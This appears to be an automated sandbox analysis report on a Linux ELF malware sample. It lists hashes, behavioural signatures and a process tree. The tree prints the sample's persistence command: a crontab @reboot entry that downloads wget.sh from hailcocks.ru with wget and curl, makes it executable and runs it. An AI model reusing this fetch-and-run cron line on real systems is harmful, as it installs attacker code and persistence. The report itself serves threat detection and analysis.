Analysis

max time kernel: 130s
max time network: 136s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 28-10-2024 02:24
Behavioral task: behavioral1
Sample: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
Resource: ubuntu2204-amd64-20240611-en
General

Target: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
Size: 93KB
MD5: bb9275394716c60d1941432c7085ca13
SHA1: 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512: 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d
SSDEEP: 1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP
Malware Config

Signatures

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.

Renames itself (1 IoCs)
Processes:
  pid: 1570; process: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf

Unexpected DNS network traffic destination (1 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
  description: Destination IP; ioc: 217.160.70.42

Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
  description: File opened for modification; ioc: /var/spool/cron/crontabs/tmp.HAq4X7; process: crontab

Changes its process name (1 IoCs)
Processes:
  description: Changes the process name, possibly in an attempt to hide itself; ioc: [kswapd0]; pid: 1570; process: 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
Processes

/tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
  command line: /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
  - Renames itself
  - Changes its process name
  PID: 1570
  /bin/sh
    command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    - File and Directory Permissions Modification
    PID: 1571
    /usr/bin/crontab
      command line: crontab -
      - Creates/modifies Cron job
      PID: 1573
    /usr/bin/crontab
      command line: crontab -l
      PID: 1574
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 306B
MD5: 3afbea3182e7ee7d34038d10c18b2ac4
SHA1: 1d2168cb7cd54872f95082bb778efe16868150e5
SHA256: 7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b
SHA512: 8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01